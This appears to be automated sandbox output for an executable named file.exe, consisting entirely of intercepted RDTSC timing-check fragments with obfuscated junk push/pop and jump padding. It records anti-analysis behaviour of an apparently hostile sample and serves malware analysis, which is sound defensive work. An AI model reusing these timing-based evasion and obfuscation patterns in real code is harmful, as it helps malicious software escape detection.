Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55468D second address: 5546BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F075CBABED9h 0x00000012 jmp 00007F075CBABECAh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F47FF second address: 4F4803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F4803 second address: 4F4817 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F075CBABECEh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F4817 second address: 4F4822 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F075D128EF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5592B6 second address: 5592BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5592BB second address: 5592C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5592C1 second address: 5592C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5592C5 second address: 559305 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F075D128EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007F075D128EFEh 0x00000015 mov eax, dword ptr [eax] 0x00000017 jg 00007F075D128F07h 0x0000001d jmp 00007F075D128F01h 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 push ecx 0x0000002a pop ecx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 559305 second address: 559317 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F075CBABEC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F075CBABECCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5593A0 second address: 5593AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5594B8 second address: 5594BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5594BC second address: 5594C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 559542 second address: 55957F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 je 00007F075CBABEDBh 0x0000000d push ebx 0x0000000e jmp 00007F075CBABED3h 0x00000013 pop ebx 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jmp 00007F075CBABED0h 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 pop eax 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55F96E second address: 55F994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F075D128EF6h 0x0000000a jmp 00007F075D128EFBh 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F075D128EFBh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E6F53 second address: 4E6F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F075CBABECAh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E6F62 second address: 4E6F67 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E6F67 second address: 4E6F87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F075CBABECCh 0x00000009 pop edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E6F87 second address: 4E6F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F075D128EFFh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E6F9B second address: 4E6FA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55EB87 second address: 55EB9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jl 00007F075D128F18h 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F075D128EF6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55EB9A second address: 55EBA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55EBA0 second address: 55EBAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55EBAA second address: 55EBAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55ED01 second address: 55ED1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F075D128F07h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55ED1E second address: 55ED28 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F075CBABEC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55ED28 second address: 55ED2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55ED2E second address: 55ED34 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55EFEB second address: 55EFF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55EFF1 second address: 55F024 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F075CBABED0h 0x00000008 jng 00007F075CBABEC6h 0x0000000e jmp 00007F075CBABED4h 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55F3B6 second address: 55F3BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55F3BA second address: 55F3CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABECDh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55F3CB second address: 55F3D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55F503 second address: 55F524 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jnl 00007F075CBABEC6h 0x0000000d popad 0x0000000e pushad 0x0000000f jmp 00007F075CBABED0h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55F661 second address: 55F66D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F075D128EF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55F66D second address: 55F673 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55F673 second address: 55F677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55F677 second address: 55F680 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E8B4C second address: 4E8B50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E8B50 second address: 4E8B64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F075CBABECEh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E8B64 second address: 4E8B70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jng 00007F075D128EF6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E8B70 second address: 4E8B8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABED6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E8B8E second address: 4E8B92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56865F second address: 568663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 566F86 second address: 566F8E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 567124 second address: 567128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5672A1 second address: 5672AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F075D128EF6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5672AD second address: 5672B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 567890 second address: 5678B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F075D128F05h 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5678B2 second address: 5678B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 567B73 second address: 567B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jng 00007F075D128EFEh 0x0000000b jng 00007F075D128EF6h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 567B86 second address: 567BB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F075CBABED6h 0x00000008 jg 00007F075CBABEC6h 0x0000000e ja 00007F075CBABEC6h 0x00000014 popad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 567D22 second address: 567D28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 567D28 second address: 567D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 567D2D second address: 567D32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 567EE5 second address: 567EF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F075CBABEC6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5684E2 second address: 5684EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5684EC second address: 5684F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56F686 second address: 56F693 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F075D128EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52D858 second address: 52D85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52D85C second address: 513D17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F075D128F00h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ecx 0x0000000f push ebx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop ebx 0x00000013 pop ecx 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F075D128EF8h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f sub dword ptr [ebp+1245C068h], ebx 0x00000035 call dword ptr [ebp+122D2271h] 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F075D128F00h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52D94E second address: 52D96D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F075CBABED4h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52D96D second address: 52D977 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F075D128EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52DD02 second address: 52DD06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52DD06 second address: 52DD40 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F075D128EF8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push esi 0x0000000f jmp 00007F075D128F04h 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F075D128F04h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52DE77 second address: 52DEB0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F075CBABED8h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 push edi 0x00000014 pushad 0x00000015 popad 0x00000016 pop edi 0x00000017 push edx 0x00000018 jnl 00007F075CBABEC6h 0x0000001e pop edx 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 pushad 0x00000023 push ecx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52DEB0 second address: 52DEFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jne 00007F075D128EF8h 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jmp 00007F075D128F02h 0x00000015 pop eax 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F075D128EF8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 xor ch, FFFFFFCEh 0x00000033 push 9F6A58A0h 0x00000038 push esi 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52DFFE second address: 52E02B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F075CBABEC6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], esi 0x00000011 jmp 00007F075CBABECDh 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 ja 00007F075CBABECCh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E02B second address: 52E031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E031 second address: 52E035 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E19A second address: 52E19E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E2C9 second address: 52E2F9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F075CBABECCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d movzx edi, cx 0x00000010 push 00000004h 0x00000012 ja 00007F075CBABECCh 0x00000018 nop 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c je 00007F075CBABEC6h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E2F9 second address: 52E2FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E2FE second address: 52E30B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E7A9 second address: 52E7C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128F02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F075D128EF6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E920 second address: 52E926 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E926 second address: 52E97E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128F09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F075D128EFBh 0x00000012 mov eax, dword ptr [eax] 0x00000014 jmp 00007F075D128EFBh 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jne 00007F075D128EF6h 0x00000026 jmp 00007F075D128F01h 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52EA46 second address: 52EA98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABED8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c je 00007F075CBABEC8h 0x00000012 mov ecx, ebx 0x00000014 jmp 00007F075CBABED4h 0x00000019 lea eax, dword ptr [ebp+12482531h] 0x0000001f jo 00007F075CBABEC6h 0x00000025 nop 0x00000026 push eax 0x00000027 push edx 0x00000028 je 00007F075CBABEC8h 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52EA98 second address: 51489F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 pop edx 0x00000012 nop 0x00000013 jmp 00007F075D128EFDh 0x00000018 call dword ptr [ebp+122D282Eh] 0x0000001e jng 00007F075D128F13h 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 push edi 0x00000028 pop edi 0x00000029 jmp 00007F075D128F02h 0x0000002e jmp 00007F075D128F00h 0x00000033 push eax 0x00000034 pop eax 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56FAFB second address: 56FB01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56FB01 second address: 56FB05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56FB05 second address: 56FB09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56FB09 second address: 56FB0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56FB0F second address: 56FB1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F075CBABEC6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56FB1E second address: 56FB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56FC96 second address: 56FC9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56FC9E second address: 56FCC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F075D128EF6h 0x00000009 jmp 00007F075D128F06h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56FE0D second address: 56FE11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56FE11 second address: 56FE1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56FE1B second address: 56FE25 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F075CBABEC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56FE25 second address: 56FE50 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F075D128EFDh 0x00000008 jng 00007F075D128EF6h 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F075D128EFDh 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56FE50 second address: 56FE6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABED7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 576272 second address: 576279 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
